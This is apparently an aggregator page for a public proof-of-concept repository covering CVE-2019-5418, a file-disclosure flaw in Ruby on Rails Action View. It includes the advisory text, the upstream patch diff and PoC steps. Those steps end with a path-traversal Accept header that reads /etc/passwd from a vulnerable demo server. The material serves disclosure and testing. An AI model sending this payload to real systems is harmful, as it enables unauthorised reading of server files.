mpgn / Cve 2019 5418
CVE-2019-5418 - File Content Disclosure on Ruby on Rails
Stars: ✭ 169
Labels
Projects that are alternatives of or similar to Cve 2019 5418
Capistrano Rails Console
Capistrano plugin which adds a remote rails console and dbconsole
Stars: ✭ 166 (-1.78%)
Mutual labels: rails
Expertiza
Expertiza is a web application through which students can submit and peer-review learning objects (articles, code, web sites, etc). The Expertiza project is supported by the National Science Foundation.
Stars: ✭ 160 (-5.33%)
Mutual labels: rails
Authie
👮♂️ Improve user session security in Ruby on Rails applications with database session storage
Stars: ✭ 161 (-4.73%)
Mutual labels: rails
Her
Her is an ORM (Object Relational Mapper) that maps REST resources to Ruby objects. It is designed to build applications that are powered by a RESTful API instead of a database.
Stars: ✭ 1,974 (+1068.05%)
Mutual labels: rails
Draftsman
Ruby gem that lets you create draft versions of your database records.
Stars: ✭ 159 (-5.92%)
Mutual labels: rails
Foreman
an application that automates the lifecycle of servers
Stars: ✭ 2,102 (+1143.79%)
Mutual labels: rails
Flipflop
Flipflop lets you declare and manage feature flags in your Rails application.
Stars: ✭ 165 (-2.37%)
Mutual labels: rails
Ruby Bookmarks
Ruby and Ruby on Rails bookmarks collection
Stars: ✭ 1,972 (+1066.86%)
Mutual labels: rails
Stackneveroverflow
A simple Q&A platform using Ruby on Rails, support markdown.
Stars: ✭ 164 (-2.96%)
Mutual labels: rails
Graphql Rails Blog
Blog App built with Rails 5, React and GraphQL
Stars: ✭ 160 (-5.33%)
Mutual labels: rails
Awesome Opensource Apps
🏠ℹ️ Curated list of awesome open source crafted web & mobile applications - Learn, Fork, Contribute & Most Importantly Enjoy!
Stars: ✭ 2,199 (+1201.18%)
Mutual labels: rails
Wheel
Don't reinvent the wheel for every new Rails project. Use sane Defaults.
Stars: ✭ 163 (-3.55%)
Mutual labels: rails
Turbolinks render
Support for `render` with Turbolinks in Rails controllers
Stars: ✭ 168 (-0.59%)
Mutual labels: rails
Staytus
💡 An open source solution for publishing the status of your services
Stars: ✭ 2,032 (+1102.37%)
Mutual labels: rails
CVE-2019-5418 - File Content Disclosure on Rails
EDIT: this CVE can lead to a Remote Code Execution, more info: https://github.com/mpgn/Rails-doubletap-RCE
There is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to
render file:
can cause arbitrary files on the target server to be rendered, disclosing the file contents.
The impact is limited to calls to
render
which render file contents without a specified accept format. Impacted code in a controller looks something like this:
found by John Hawthorn from GitHub
Technical Analysis:
Security Advisory:
Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <[email protected]>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types
[CVE-2019-5418]
[CVE-2019-5419]
---
.../lib/action_dispatch/http/mime_negotiation.rb | 5 +++++
actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
.../new_base/content_negotiation_test.rb | 14 ++++++++++++--
3 files changed, 23 insertions(+), 6 deletions(-)
diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
else
[Mime[:html]]
end
+
+ v = v.select do |format|
+ format.symbol || format.ref == "*/*"
+ end
+
set_header k, v
end
end
Proof Of Concept
- Run the vulnerable application inside the demo folder:
[email protected]:~$ cd demo/
[email protected]:~$ bundle install
[...]
[email protected]:~$ rails s 12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)
Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
Rendering README.md within layouts/application
Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
- Go to the route
/chybeta
- Intercept with burp the request and replace the
Accept
header withAccept: ../../../../../../../../../../etc/passwd{{
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].